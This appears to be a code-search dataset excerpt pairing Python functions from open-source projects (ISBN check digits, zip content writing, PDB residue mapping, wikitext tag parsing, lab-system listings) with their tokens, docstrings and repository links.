[ "def", "_check_digit", "(", "self", ")", ":", "weights", "=", "(", "1", "if", "x", "%", "2", "==", "0", "else", "3", "for", "x", "in", "range", "(", "12", ")", ")", "body", "=", "''", ".", "join", "(", "[", "self", ".", "ean", ",", "self", ".", "group", ",", "self", ".", "registrant", ",", "self", ".", "publication", "]", ")", "remainder", "=", "sum", "(", "int", "(", "b", ")", "*", "w", "for", "b", ",", "w", "in", "zip", "(", "body", ",", "weights", ")", ")", "%", "10", "diff", "=", "10", "-", "remainder", "check_digit", "=", "0", "if", "diff", "==", "10", "else", "diff", "return", "str", "(", "check_digit", ")" ]
Calculate the check digit for ISBN-13. See https://en.wikipedia.org/wiki/International_Standard_Book_Number for calculation.
[ "Calculate", "the", "check", "digit", "for", "ISBN", "-", "13", ".", "See", "https", ":", "//", "en", ".", "wikipedia", ".", "org", "/", "wiki", "/", "International_Standard_Book_Number", "for", "calculation", "." ]
python
train
learningequality/ricecooker
ricecooker/utils/data_writer.py
https://github.com/learningequality/ricecooker/blob/2f0385282500cb77ef2894646c6f9ce11bd7a853/ricecooker/utils/data_writer.py#L148-L180
def add_file(self, path, title, download_url, write_data=True, ext=None, license=None, copyright_holder=None, **node_data): """ add_file: Creates file in csv and writes file to zip Args: path: (str) where in zip to write file title: (str) content's title download_url: (str) url or local path to download from write_data: (boolean) indicates whether to add as a csv entry (optional) ext: (str) extension to use for file license (str): content's license copyright_holder (str): holder of content's license (required except for PUBLIC_DOMAIN) license_description (str): description of content's license (optional) source_id: (str) content's original id (optional) description: (str) description of content (optional) author (str): who created the content (optional) language (str): language of content (optional) thumbnail (str): path to thumbnail in zip (optional) Returns: path to file in zip """ if write_data: assert license, "Files must have a license" copyright_holder = None if not copyright_holder or copyright_holder.strip() == '' else copyright_holder assert license in NO_COPYRIGHT_HOLDER_REQUIRED or copyright_holder, "Licenses must have a copyright holder if they are not public domain" self._parse_path(path) if not ext: _name, ext = os.path.splitext(download_url or "") ext = ext.lower() # normalize to lowercase extensions inside zip archive filepath = "{}/{}{}".format(path, title, ext) if download_url and filepath: self._write_to_zip(filepath, read(download_url)) if write_data: self._commit(filepath, title, license=license, copyright_holder=copyright_holder, **node_data) return filepath
[ "def", "add_file", "(", "self", ",", "path", ",", "title", ",", "download_url", ",", "write_data", "=", "True", ",", "ext", "=", "None", ",", "license", "=", "None", ",", "copyright_holder", "=", "None", ",", "*", "*", "node_data", ")", ":", "if", "write_data", ":", "assert", "license", ",", "\"Files must have a license\"", "copyright_holder", "=", "None", "if", "not", "copyright_holder", "or", "copyright_holder", ".", "strip", "(", ")", "==", "''", "else", "copyright_holder", "assert", "license", "in", "NO_COPYRIGHT_HOLDER_REQUIRED", "or", "copyright_holder", ",", "\"Licenses must have a copyright holder if they are not public domain\"", "self", ".", "_parse_path", "(", "path", ")", "if", "not", "ext", ":", "_name", ",", "ext", "=", "os", ".", "path", ".", "splitext", "(", "download_url", "or", "\"\"", ")", "ext", "=", "ext", ".", "lower", "(", ")", "# normalize to lowercase extensions inside zip archive", "filepath", "=", "\"{}/{}{}\"", ".", "format", "(", "path", ",", "title", ",", "ext", ")", "if", "download_url", "and", "filepath", ":", "self", ".", "_write_to_zip", "(", "filepath", ",", "read", "(", "download_url", ")", ")", "if", "write_data", ":", "self", ".", "_commit", "(", "filepath", ",", "title", ",", "license", "=", "license", ",", "copyright_holder", "=", "copyright_holder", ",", "*", "*", "node_data", ")", "return", "filepath" ]
add_file: Creates file in csv and writes file to zip Args: path: (str) where in zip to write file title: (str) content's title download_url: (str) url or local path to download from write_data: (boolean) indicates whether to add as a csv entry (optional) ext: (str) extension to use for file license (str): content's license copyright_holder (str): holder of content's license (required except for PUBLIC_DOMAIN) license_description (str): description of content's license (optional) source_id: (str) content's original id (optional) description: (str) description of content (optional) author (str): who created the content (optional) language (str): language of content (optional) thumbnail (str): path to thumbnail in zip (optional) Returns: path to file in zip
[ "add_file", ":", "Creates", "file", "in", "csv", "and", "writes", "file", "to", "zip", "Args", ":", "path", ":", "(", "str", ")", "where", "in", "zip", "to", "write", "file", "title", ":", "(", "str", ")", "content", "s", "title", "download_url", ":", "(", "str", ")", "url", "or", "local", "path", "to", "download", "from", "write_data", ":", "(", "boolean", ")", "indicates", "whether", "to", "add", "as", "a", "csv", "entry", "(", "optional", ")", "ext", ":", "(", "str", ")", "extension", "to", "use", "for", "file", "license", "(", "str", ")", ":", "content", "s", "license", "copyright_holder", "(", "str", ")", ":", "holder", "of", "content", "s", "license", "(", "required", "except", "for", "PUBLIC_DOMAIN", ")", "license_description", "(", "str", ")", ":", "description", "of", "content", "s", "license", "(", "optional", ")", "source_id", ":", "(", "str", ")", "content", "s", "original", "id", "(", "optional", ")", "description", ":", "(", "str", ")", "description", "of", "content", "(", "optional", ")", "author", "(", "str", ")", ":", "who", "created", "the", "content", "(", "optional", ")", "language", "(", "str", ")", ":", "language", "of", "content", "(", "optional", ")", "thumbnail", "(", "str", ")", ":", "path", "to", "thumbnail", "in", "zip", "(", "optional", ")", "Returns", ":", "path", "to", "file", "in", "zip" ]
python
train
a1ezzz/wasp-general
wasp_general/network/service.py
https://github.com/a1ezzz/wasp-general/blob/1029839d33eb663f8dec76c1c46754d53c1de4a9/wasp_general/network/service.py#L104-L114
def start(self): """ Set up handler and start loop :return: None """ timeout = self.timeout() if timeout is not None and timeout > 0: self.__loop.add_timeout(timedelta(0, timeout), self.stop) self.handler().setup_handler(self.loop()) self.loop().start() self.handler().loop_stopped()
[ "def", "start", "(", "self", ")", ":", "timeout", "=", "self", ".", "timeout", "(", ")", "if", "timeout", "is", "not", "None", "and", "timeout", ">", "0", ":", "self", ".", "__loop", ".", "add_timeout", "(", "timedelta", "(", "0", ",", "timeout", ")", ",", "self", ".", "stop", ")", "self", ".", "handler", "(", ")", ".", "setup_handler", "(", "self", ".", "loop", "(", ")", ")", "self", ".", "loop", "(", ")", ".", "start", "(", ")", "self", ".", "handler", "(", ")", ".", "loop_stopped", "(", ")" ]
Set up handler and start loop :return: None
[ "Set", "up", "handler", "and", "start", "loop" ]
python
train
cqparts/cqparts
src/cqparts_motors/stepper.py
https://github.com/cqparts/cqparts/blob/018e87e14c2c4d1d40b4bfe6a7e22bcf9baf0a53/src/cqparts_motors/stepper.py#L200-L205
def apply_cutout(self): " shaft cutout " stepper_shaft = self.components['shaft'] top = self.components['topcap'] local_obj = top.local_obj local_obj = local_obj.cut(stepper_shaft.get_cutout(clearance=0.5))
[ "def", "apply_cutout", "(", "self", ")", ":", "stepper_shaft", "=", "self", ".", "components", "[", "'shaft'", "]", "top", "=", "self", ".", "components", "[", "'topcap'", "]", "local_obj", "=", "top", ".", "local_obj", "local_obj", "=", "local_obj", ".", "cut", "(", "stepper_shaft", ".", "get_cutout", "(", "clearance", "=", "0.5", ")", ")" ]
shaft cutout
[ "shaft", "cutout" ]
python
train
bradmontgomery/django-redis-metrics
redis_metrics/templatetags/redis_metric_tags.py
https://github.com/bradmontgomery/django-redis-metrics/blob/2c92332920113d28c39234b949aa496b39a091d1/redis_metrics/templatetags/redis_metric_tags.py#L93-L112
def metric_detail(slug, with_data_table=False): """Template Tag to display a metric's *current* detail. * ``slug`` -- the metric's unique slug * ``with_data_table`` -- if True, prints the raw data in a table. """ r = get_r() granularities = list(r._granularities()) metrics = r.get_metric(slug) metrics_data = [] for g in granularities: metrics_data.append((g, metrics[g])) return { 'granularities': [g.title() for g in granularities], 'slug': slug, 'metrics': metrics_data, 'with_data_table': with_data_table, }
[ "def", "metric_detail", "(", "slug", ",", "with_data_table", "=", "False", ")", ":", "r", "=", "get_r", "(", ")", "granularities", "=", "list", "(", "r", ".", "_granularities", "(", ")", ")", "metrics", "=", "r", ".", "get_metric", "(", "slug", ")", "metrics_data", "=", "[", "]", "for", "g", "in", "granularities", ":", "metrics_data", ".", "append", "(", "(", "g", ",", "metrics", "[", "g", "]", ")", ")", "return", "{", "'granularities'", ":", "[", "g", ".", "title", "(", ")", "for", "g", "in", "granularities", "]", ",", "'slug'", ":", "slug", ",", "'metrics'", ":", "metrics_data", ",", "'with_data_table'", ":", "with_data_table", ",", "}" ]
Template Tag to display a metric's *current* detail. * ``slug`` -- the metric's unique slug * ``with_data_table`` -- if True, prints the raw data in a table.
[ "Template", "Tag", "to", "display", "a", "metric", "s", "*", "current", "*", "detail", "." ]
python
train
tornadoweb/tornado
tornado/util.py
https://github.com/tornadoweb/tornado/blob/b8b481770bcdb333a69afde5cce7eaa449128326/tornado/util.py#L103-L114
def decompress(self, value: bytes, max_length: int = 0) -> bytes: """Decompress a chunk, returning newly-available data. Some data may be buffered for later processing; `flush` must be called when there is no more input data to ensure that all data was processed. If ``max_length`` is given, some input data may be left over in ``unconsumed_tail``; you must retrieve this value and pass it back to a future call to `decompress` if it is not empty. """ return self.decompressobj.decompress(value, max_length)
[ "def", "decompress", "(", "self", ",", "value", ":", "bytes", ",", "max_length", ":", "int", "=", "0", ")", "->", "bytes", ":", "return", "self", ".", "decompressobj", ".", "decompress", "(", "value", ",", "max_length", ")" ]
Decompress a chunk, returning newly-available data. Some data may be buffered for later processing; `flush` must be called when there is no more input data to ensure that all data was processed. If ``max_length`` is given, some input data may be left over in ``unconsumed_tail``; you must retrieve this value and pass it back to a future call to `decompress` if it is not empty.
[ "Decompress", "a", "chunk", "returning", "newly", "-", "available", "data", "." ]
python
train
Kortemme-Lab/klab
klab/bio/pdb.py
https://github.com/Kortemme-Lab/klab/blob/6d410ad08f1bd9f7cbbb28d7d946e94fbaaa2b6b/klab/bio/pdb.py#L2115-L2234
def GetRosettaResidueMap(self, ConvertMSEToAtom = False, RemoveIncompleteFinalResidues = False, RemoveIncompleteResidues = False): '''Note: This function ignores any DNA.''' raise Exception('This code looks to be deprecated. Use construct_pdb_to_rosetta_residue_map instead.') chain = None sequences = {} residue_map = {} resid_set = set() resid_list = [] DNA_residues = set([' DA', ' DC', ' DG', ' DT']) chains = [] self.RAW_ATOM_SEQUENCE = [] essential_atoms_1 = set(['CA', 'C', 'N'])#, 'O']) essential_atoms_2 = set(['CA', 'C', 'N'])#, 'OG']) current_atoms = set() atoms_read = {} oldchainID = None removed_residue = {} for line in self.lines: if line[0:4] == 'ATOM' or (ConvertMSEToAtom and (line[0:6] == 'HETATM') and (line[17:20] == 'MSE')): chainID = line[21] if missing_chain_ids.get(self.pdb_id): chainID = missing_chain_ids[self.pdb_id] if chainID not in chains: chains.append(chainID) residue_longname = line[17:20] if residue_longname in DNA_residues: # Skip DNA continue if residue_longname == 'UNK': # Skip unknown residues continue if residue_longname not in allowed_PDB_residues_types and not(ConvertMSEToAtom and residue_longname == 'MSE'): if not self.strict: # Skip unknown residues continue else: raise NonCanonicalResidueException("Residue %s encountered: %s" % (line[17:20], line)) else: resid = line[21:27] #print(chainID, residue_longname, resid) #print(line) #print(resid_list) if resid not in resid_set: removed_residue[chainID] = False add_residue = True if current_atoms: if RemoveIncompleteResidues and essential_atoms_1.intersection(current_atoms) != essential_atoms_1 and essential_atoms_2.intersection(current_atoms) != essential_atoms_2: oldChain = resid_list[-1][0] oldResidueID = resid_list[-1][1:] print("The last residue '%s', %s, in chain %s is missing these atoms: %s." % (resid_list[-1], residue_longname, oldChain, essential_atoms_1.difference(current_atoms) or essential_atoms_2.difference(current_atoms))) resid_set.remove(resid_list[-1]) #print("".join(resid_list)) resid_list = resid_list[:-1] if oldchainID: removed_residue[oldchainID] = True #print("".join(resid_list)) #print(sequences[oldChain]) if sequences.get(oldChain): sequences[oldChain] = sequences[oldChain][:-1] if residue_map.get(oldChain): residue_map[oldChain] = residue_map[oldChain][:-1] #print(sequences[oldChain] else: assert(not(resid_set)) current_atoms = set() atoms_read[chainID] = set() atoms_read[chainID].add(line[12:15].strip()) resid_set.add(resid) resid_list.append(resid) chainID = line[21] sequences[chainID] = sequences.get(chainID, []) if residue_longname in non_canonical_amino_acids: sequences[chainID].append(non_canonical_amino_acids[residue_longname]) else: sequences[chainID].append(residue_type_3to1_map[residue_longname]) residue_map[chainID] = residue_map.get(chainID, []) if residue_longname in non_canonical_amino_acids: residue_map[chainID].append((resid, non_canonical_amino_acids[residue_longname])) else: residue_map[chainID].append((resid, residue_type_3to1_map[residue_longname])) oldchainID = chainID else: #atoms_read[chainID] = atoms_read.get(chainID, set()) atoms_read[chainID].add(line[12:15].strip()) current_atoms.add(line[12:15].strip()) if RemoveIncompleteFinalResidues: # These are (probably) necessary for Rosetta to keep the residue. Rosetta does throw away residues where only the N atom is present if that residue is at the end of a chain. for chainID, sequence_list in sequences.iteritems(): if not(removed_residue[chainID]): if essential_atoms_1.intersection(atoms_read[chainID]) != essential_atoms_1 and essential_atoms_2.intersection(atoms_read[chainID]) != essential_atoms_2: print("The last residue %s of chain %s is missing these atoms: %s." % (sequence_list[-1], chainID, essential_atoms_1.difference(atoms_read[chainID]) or essential_atoms_2.difference(atoms_read[chainID]))) oldResidueID = sequence_list[-1][1:] residue_map[chainID] = residue_map[chainID][0:-1] sequences[chainID] = sequence_list[0:-1] for chainID, sequence_list in sequences.iteritems(): sequences[chainID] = "".join(sequence_list) assert(sequences[chainID] == "".join([res_details[1] for res_details in residue_map[chainID]])) for chainID in chains: for a_acid in sequences.get(chainID, ""): self.RAW_ATOM_SEQUENCE.append((chainID, a_acid)) residue_objects = {} for chainID in residue_map.keys(): residue_objects[chainID] = [] for chainID, residue_list in residue_map.iteritems(): for res_pair in residue_list: resid = res_pair[0] resaa = res_pair[1] assert(resid[0] == chainID) residue_objects[chainID].append((resid[1:].strip(), resaa)) return sequences, residue_objects
[ "def", "GetRosettaResidueMap", "(", "self", ",", "ConvertMSEToAtom", "=", "False", ",", "RemoveIncompleteFinalResidues", "=", "False", ",", "RemoveIncompleteResidues", "=", "False", ")", ":", "raise", "Exception", "(", "'This code looks to be deprecated. Use construct_pdb_to_rosetta_residue_map instead.'", ")", "chain", "=", "None", "sequences", "=", "{", "}", "residue_map", "=", "{", "}", "resid_set", "=", "set", "(", ")", "resid_list", "=", "[", "]", "DNA_residues", "=", "set", "(", "[", "' DA'", ",", "' DC'", ",", "' DG'", ",", "' DT'", "]", ")", "chains", "=", "[", "]", "self", ".", "RAW_ATOM_SEQUENCE", "=", "[", "]", "essential_atoms_1", "=", "set", "(", "[", "'CA'", ",", "'C'", ",", "'N'", "]", ")", "#, 'O'])", "essential_atoms_2", "=", "set", "(", "[", "'CA'", ",", "'C'", ",", "'N'", "]", ")", "#, 'OG'])", "current_atoms", "=", "set", "(", ")", "atoms_read", "=", "{", "}", "oldchainID", "=", "None", "removed_residue", "=", "{", "}", "for", "line", "in", "self", ".", "lines", ":", "if", "line", "[", "0", ":", "4", "]", "==", "'ATOM'", "or", "(", "ConvertMSEToAtom", "and", "(", "line", "[", "0", ":", "6", "]", "==", "'HETATM'", ")", "and", "(", "line", "[", "17", ":", "20", "]", "==", "'MSE'", ")", ")", ":", "chainID", "=", "line", "[", "21", "]", "if", "missing_chain_ids", ".", "get", "(", "self", ".", "pdb_id", ")", ":", "chainID", "=", "missing_chain_ids", "[", "self", ".", "pdb_id", "]", "if", "chainID", "not", "in", "chains", ":", "chains", ".", "append", "(", "chainID", ")", "residue_longname", "=", "line", "[", "17", ":", "20", "]", "if", "residue_longname", "in", "DNA_residues", ":", "# Skip DNA", "continue", "if", "residue_longname", "==", "'UNK'", ":", "# Skip unknown residues", "continue", "if", "residue_longname", "not", "in", "allowed_PDB_residues_types", "and", "not", "(", "ConvertMSEToAtom", "and", "residue_longname", "==", "'MSE'", ")", ":", "if", "not", "self", ".", "strict", ":", "# Skip unknown residues", "continue", "else", ":", "raise", "NonCanonicalResidueException", "(", "\"Residue %s encountered: %s\"", "%", "(", "line", "[", "17", ":", "20", "]", ",", "line", ")", ")", "else", ":", "resid", "=", "line", "[", "21", ":", "27", "]", "#print(chainID, residue_longname, resid)", "#print(line)", "#print(resid_list)", "if", "resid", "not", "in", "resid_set", ":", "removed_residue", "[", "chainID", "]", "=", "False", "add_residue", "=", "True", "if", "current_atoms", ":", "if", "RemoveIncompleteResidues", "and", "essential_atoms_1", ".", "intersection", "(", "current_atoms", ")", "!=", "essential_atoms_1", "and", "essential_atoms_2", ".", "intersection", "(", "current_atoms", ")", "!=", "essential_atoms_2", ":", "oldChain", "=", "resid_list", "[", "-", "1", "]", "[", "0", "]", "oldResidueID", "=", "resid_list", "[", "-", "1", "]", "[", "1", ":", "]", "print", "(", "\"The last residue '%s', %s, in chain %s is missing these atoms: %s.\"", "%", "(", "resid_list", "[", "-", "1", "]", ",", "residue_longname", ",", "oldChain", ",", "essential_atoms_1", ".", "difference", "(", "current_atoms", ")", "or", "essential_atoms_2", ".", "difference", "(", "current_atoms", ")", ")", ")", "resid_set", ".", "remove", "(", "resid_list", "[", "-", "1", "]", ")", "#print(\"\".join(resid_list))", "resid_list", "=", "resid_list", "[", ":", "-", "1", "]", "if", "oldchainID", ":", "removed_residue", "[", "oldchainID", "]", "=", "True", "#print(\"\".join(resid_list))", "#print(sequences[oldChain])", "if", "sequences", ".", "get", "(", "oldChain", ")", ":", "sequences", "[", "oldChain", "]", "=", "sequences", "[", "oldChain", "]", "[", ":", "-", "1", "]", "if", "residue_map", ".", "get", "(", "oldChain", ")", ":", "residue_map", "[", "oldChain", "]", "=", "residue_map", "[", "oldChain", "]", "[", ":", "-", "1", "]", "#print(sequences[oldChain]", "else", ":", "assert", "(", "not", "(", "resid_set", ")", ")", "current_atoms", "=", "set", "(", ")", "atoms_read", "[", "chainID", "]", "=", "set", "(", ")", "atoms_read", "[", "chainID", "]", ".", "add", "(", "line", "[", "12", ":", "15", "]", ".", "strip", "(", ")", ")", "resid_set", ".", "add", "(", "resid", ")", "resid_list", ".", "append", "(", "resid", ")", "chainID", "=", "line", "[", "21", "]", "sequences", "[", "chainID", "]", "=", "sequences", ".", "get", "(", "chainID", ",", "[", "]", ")", "if", "residue_longname", "in", "non_canonical_amino_acids", ":", "sequences", "[", "chainID", "]", ".", "append", "(", "non_canonical_amino_acids", "[", "residue_longname", "]", ")", "else", ":", "sequences", "[", "chainID", "]", ".", "append", "(", "residue_type_3to1_map", "[", "residue_longname", "]", ")", "residue_map", "[", "chainID", "]", "=", "residue_map", ".", "get", "(", "chainID", ",", "[", "]", ")", "if", "residue_longname", "in", "non_canonical_amino_acids", ":", "residue_map", "[", "chainID", "]", ".", "append", "(", "(", "resid", ",", "non_canonical_amino_acids", "[", "residue_longname", "]", ")", ")", "else", ":", "residue_map", "[", "chainID", "]", ".", "append", "(", "(", "resid", ",", "residue_type_3to1_map", "[", "residue_longname", "]", ")", ")", "oldchainID", "=", "chainID", "else", ":", "#atoms_read[chainID] = atoms_read.get(chainID, set())", "atoms_read", "[", "chainID", "]", ".", "add", "(", "line", "[", "12", ":", "15", "]", ".", "strip", "(", ")", ")", "current_atoms", ".", "add", "(", "line", "[", "12", ":", "15", "]", ".", "strip", "(", ")", ")", "if", "RemoveIncompleteFinalResidues", ":", "# These are (probably) necessary for Rosetta to keep the residue. Rosetta does throw away residues where only the N atom is present if that residue is at the end of a chain.", "for", "chainID", ",", "sequence_list", "in", "sequences", ".", "iteritems", "(", ")", ":", "if", "not", "(", "removed_residue", "[", "chainID", "]", ")", ":", "if", "essential_atoms_1", ".", "intersection", "(", "atoms_read", "[", "chainID", "]", ")", "!=", "essential_atoms_1", "and", "essential_atoms_2", ".", "intersection", "(", "atoms_read", "[", "chainID", "]", ")", "!=", "essential_atoms_2", ":", "print", "(", "\"The last residue %s of chain %s is missing these atoms: %s.\"", "%", "(", "sequence_list", "[", "-", "1", "]", ",", "chainID", ",", "essential_atoms_1", ".", "difference", "(", "atoms_read", "[", "chainID", "]", ")", "or", "essential_atoms_2", ".", "difference", "(", "atoms_read", "[", "chainID", "]", ")", ")", ")", "oldResidueID", "=", "sequence_list", "[", "-", "1", "]", "[", "1", ":", "]", "residue_map", "[", "chainID", "]", "=", "residue_map", "[", "chainID", "]", "[", "0", ":", "-", "1", "]", "sequences", "[", "chainID", "]", "=", "sequence_list", "[", "0", ":", "-", "1", "]", "for", "chainID", ",", "sequence_list", "in", "sequences", ".", "iteritems", "(", ")", ":", "sequences", "[", "chainID", "]", "=", "\"\"", ".", "join", "(", "sequence_list", ")", "assert", "(", "sequences", "[", "chainID", "]", "==", "\"\"", ".", "join", "(", "[", "res_details", "[", "1", "]", "for", "res_details", "in", "residue_map", "[", "chainID", "]", "]", ")", ")", "for", "chainID", "in", "chains", ":", "for", "a_acid", "in", "sequences", ".", "get", "(", "chainID", ",", "\"\"", ")", ":", "self", ".", "RAW_ATOM_SEQUENCE", ".", "append", "(", "(", "chainID", ",", "a_acid", ")", ")", "residue_objects", "=", "{", "}", "for", "chainID", "in", "residue_map", ".", "keys", "(", ")", ":", "residue_objects", "[", "chainID", "]", "=", "[", "]", "for", "chainID", ",", "residue_list", "in", "residue_map", ".", "iteritems", "(", ")", ":", "for", "res_pair", "in", "residue_list", ":", "resid", "=", "res_pair", "[", "0", "]", "resaa", "=", "res_pair", "[", "1", "]", "assert", "(", "resid", "[", "0", "]", "==", "chainID", ")", "residue_objects", "[", "chainID", "]", ".", "append", "(", "(", "resid", "[", "1", ":", "]", ".", "strip", "(", ")", ",", "resaa", ")", ")", "return", "sequences", ",", "residue_objects" ]
Note: This function ignores any DNA.
[ "Note", ":", "This", "function", "ignores", "any", "DNA", "." ]
python
train
earwig/mwparserfromhell
mwparserfromhell/parser/tokenizer.py
https://github.com/earwig/mwparserfromhell/blob/98dc30902d35c714a70aca8e6616f49d71cb24cc/mwparserfromhell/parser/tokenizer.py#L853-L886
def _really_parse_tag(self): """Actually parse an HTML tag, starting with the open (``<foo>``).""" data = _TagOpenData() self._push(contexts.TAG_OPEN) self._emit(tokens.TagOpenOpen()) while True: this, next = self._read(), self._read(1) can_exit = (not data.context & (data.CX_QUOTED | data.CX_NAME) or data.context & data.CX_NOTE_SPACE) if this is self.END: if self._context & contexts.TAG_ATTR: if data.context & data.CX_QUOTED: # Unclosed attribute quote: reset, don't die data.context = data.CX_ATTR_VALUE self._memoize_bad_route() self._pop() self._head = data.reset continue self._pop() self._fail_route() elif this == ">" and can_exit: self._handle_tag_close_open(data, tokens.TagCloseOpen) self._context = contexts.TAG_BODY if is_single_only(self._stack[1].text): return self._handle_single_only_tag_end() if is_parsable(self._stack[1].text): return self._parse(push=False) return self._handle_blacklisted_tag() elif this == "/" and next == ">" and can_exit: self._handle_tag_close_open(data, tokens.TagCloseSelfclose) return self._pop() else: self._handle_tag_data(data, this) self._head += 1
[ "def", "_really_parse_tag", "(", "self", ")", ":", "data", "=", "_TagOpenData", "(", ")", "self", ".", "_push", "(", "contexts", ".", "TAG_OPEN", ")", "self", ".", "_emit", "(", "tokens", ".", "TagOpenOpen", "(", ")", ")", "while", "True", ":", "this", ",", "next", "=", "self", ".", "_read", "(", ")", ",", "self", ".", "_read", "(", "1", ")", "can_exit", "=", "(", "not", "data", ".", "context", "&", "(", "data", ".", "CX_QUOTED", "|", "data", ".", "CX_NAME", ")", "or", "data", ".", "context", "&", "data", ".", "CX_NOTE_SPACE", ")", "if", "this", "is", "self", ".", "END", ":", "if", "self", ".", "_context", "&", "contexts", ".", "TAG_ATTR", ":", "if", "data", ".", "context", "&", "data", ".", "CX_QUOTED", ":", "# Unclosed attribute quote: reset, don't die", "data", ".", "context", "=", "data", ".", "CX_ATTR_VALUE", "self", ".", "_memoize_bad_route", "(", ")", "self", ".", "_pop", "(", ")", "self", ".", "_head", "=", "data", ".", "reset", "continue", "self", ".", "_pop", "(", ")", "self", ".", "_fail_route", "(", ")", "elif", "this", "==", "\">\"", "and", "can_exit", ":", "self", ".", "_handle_tag_close_open", "(", "data", ",", "tokens", ".", "TagCloseOpen", ")", "self", ".", "_context", "=", "contexts", ".", "TAG_BODY", "if", "is_single_only", "(", "self", ".", "_stack", "[", "1", "]", ".", "text", ")", ":", "return", "self", ".", "_handle_single_only_tag_end", "(", ")", "if", "is_parsable", "(", "self", ".", "_stack", "[", "1", "]", ".", "text", ")", ":", "return", "self", ".", "_parse", "(", "push", "=", "False", ")", "return", "self", ".", "_handle_blacklisted_tag", "(", ")", "elif", "this", "==", "\"/\"", "and", "next", "==", "\">\"", "and", "can_exit", ":", "self", ".", "_handle_tag_close_open", "(", "data", ",", "tokens", ".", "TagCloseSelfclose", ")", "return", "self", ".", "_pop", "(", ")", "else", ":", "self", ".", "_handle_tag_data", "(", "data", ",", "this", ")", "self", ".", "_head", "+=", "1" ]
Actually parse an HTML tag, starting with the open (``<foo>``).
[ "Actually", "parse", "an", "HTML", "tag", "starting", "with", "the", "open", "(", "<foo", ">", ")", "." ]
python
train
senaite/senaite.core
bika/lims/controlpanel/bika_analysisservices.py
https://github.com/senaite/senaite.core/blob/7602ce2ea2f9e81eb34e20ce17b98a3e70713f85/bika/lims/controlpanel/bika_analysisservices.py#L337-L407
def folderitem(self, obj, item, index): """Service triggered each time an item is iterated in folderitems. The use of this service prevents the extra-loops in child objects. :obj: the instance of the class to be foldered :item: dict containing the properties of the object to be used by the template :index: current index of the item """ cat = obj.getCategoryTitle() cat_order = self.an_cats_order.get(cat) if self.do_cats: # category groups entries item["category"] = cat if (cat, cat_order) not in self.categories: self.categories.append((cat, cat_order)) # Category category = obj.getCategory() if category: title = category.Title() url = category.absolute_url() item["Category"] = title item["replace"]["Category"] = get_link(url, value=title) # Calculation calculation = obj.getCalculation() if calculation: title = calculation.Title() url = calculation.absolute_url() item["Calculation"] = title item["replace"]["Calculation"] = get_link(url, value=title) # Methods methods = obj.getMethods() if methods: links = map( lambda m: get_link( m.absolute_url(), value=m.Title(), css_class="link"), methods) item["replace"]["Methods"] = ", ".join(links) # Max time allowed maxtime = obj.MaxTimeAllowed if maxtime: item["MaxTimeAllowed"] = self.format_maxtime(maxtime) # Price item["Price"] = self.format_price(obj.Price) # Duplicate Variation dup_variation = obj.DuplicateVariation if dup_variation: item["DuplicateVariation"] = self.format_duplication_variation( dup_variation) # Icons after_icons = "" if obj.getAccredited(): after_icons += get_image( "accredited.png", title=_("Accredited")) if obj.getAttachmentOption() == "r": after_icons += get_image( "attach_reqd.png", title=_("Attachment required")) if obj.getAttachmentOption() == "n": after_icons += get_image( "attach_no.png", title=_("Attachment not permitted")) if after_icons: item["after"]["Title"] = after_icons return item
[ "def", "folderitem", "(", "self", ",", "obj", ",", "item", ",", "index", ")", ":", "cat", "=", "obj", ".", "getCategoryTitle", "(", ")", "cat_order", "=", "self", ".", "an_cats_order", ".", "get", "(", "cat", ")", "if", "self", ".", "do_cats", ":", "# category groups entries", "item", "[", "\"category\"", "]", "=", "cat", "if", "(", "cat", ",", "cat_order", ")", "not", "in", "self", ".", "categories", ":", "self", ".", "categories", ".", "append", "(", "(", "cat", ",", "cat_order", ")", ")", "# Category", "category", "=", "obj", ".", "getCategory", "(", ")", "if", "category", ":", "title", "=", "category", ".", "Title", "(", ")", "url", "=", "category", ".", "absolute_url", "(", ")", "item", "[", "\"Category\"", "]", "=", "title", "item", "[", "\"replace\"", "]", "[", "\"Category\"", "]", "=", "get_link", "(", "url", ",", "value", "=", "title", ")", "# Calculation", "calculation", "=", "obj", ".", "getCalculation", "(", ")", "if", "calculation", ":", "title", "=", "calculation", ".", "Title", "(", ")", "url", "=", "calculation", ".", "absolute_url", "(", ")", "item", "[", "\"Calculation\"", "]", "=", "title", "item", "[", "\"replace\"", "]", "[", "\"Calculation\"", "]", "=", "get_link", "(", "url", ",", "value", "=", "title", ")", "# Methods", "methods", "=", "obj", ".", "getMethods", "(", ")", "if", "methods", ":", "links", "=", "map", "(", "lambda", "m", ":", "get_link", "(", "m", ".", "absolute_url", "(", ")", ",", "value", "=", "m", ".", "Title", "(", ")", ",", "css_class", "=", "\"link\"", ")", ",", "methods", ")", "item", "[", "\"replace\"", "]", "[", "\"Methods\"", "]", "=", "\", \"", ".", "join", "(", "links", ")", "# Max time allowed", "maxtime", "=", "obj", ".", "MaxTimeAllowed", "if", "maxtime", ":", "item", "[", "\"MaxTimeAllowed\"", "]", "=", "self", ".", "format_maxtime", "(", "maxtime", ")", "# Price", "item", "[", "\"Price\"", "]", "=", "self", ".", "format_price", "(", "obj", ".", "Price", ")", "# Duplicate Variation", "dup_variation", "=", "obj", ".", "DuplicateVariation", "if", "dup_variation", ":", "item", "[", "\"DuplicateVariation\"", "]", "=", "self", ".", "format_duplication_variation", "(", "dup_variation", ")", "# Icons", "after_icons", "=", "\"\"", "if", "obj", ".", "getAccredited", "(", ")", ":", "after_icons", "+=", "get_image", "(", "\"accredited.png\"", ",", "title", "=", "_", "(", "\"Accredited\"", ")", ")", "if", "obj", ".", "getAttachmentOption", "(", ")", "==", "\"r\"", ":", "after_icons", "+=", "get_image", "(", "\"attach_reqd.png\"", ",", "title", "=", "_", "(", "\"Attachment required\"", ")", ")", "if", "obj", ".", "getAttachmentOption", "(", ")", "==", "\"n\"", ":", "after_icons", "+=", "get_image", "(", "\"attach_no.png\"", ",", "title", "=", "_", "(", "\"Attachment not permitted\"", ")", ")", "if", "after_icons", ":", "item", "[", "\"after\"", "]", "[", "\"Title\"", "]", "=", "after_icons", "return", "item" ]
Service triggered each time an item is iterated in folderitems. The use of this service prevents the extra-loops in child objects. :obj: the instance of the class to be foldered :item: dict containing the properties of the object to be used by the template :index: current index of the item
[ "Service", "triggered", "each", "time", "an", "item", "is", "iterated", "in", "folderitems", ".", "The", "use", "of", "this", "service", "prevents", "the", "extra", "-", "loops", "in", "child", "objects", ".", ":", "obj", ":", "the", "instance", "of", "the", "class", "to", "be", "foldered", ":", "item", ":", "dict", "containing", "the", "properties", "of", "the", "object", "to", "be", "used", "by", "the", "template", ":", "index", ":", "current", "index", "of", "the", "item" ]
python
train
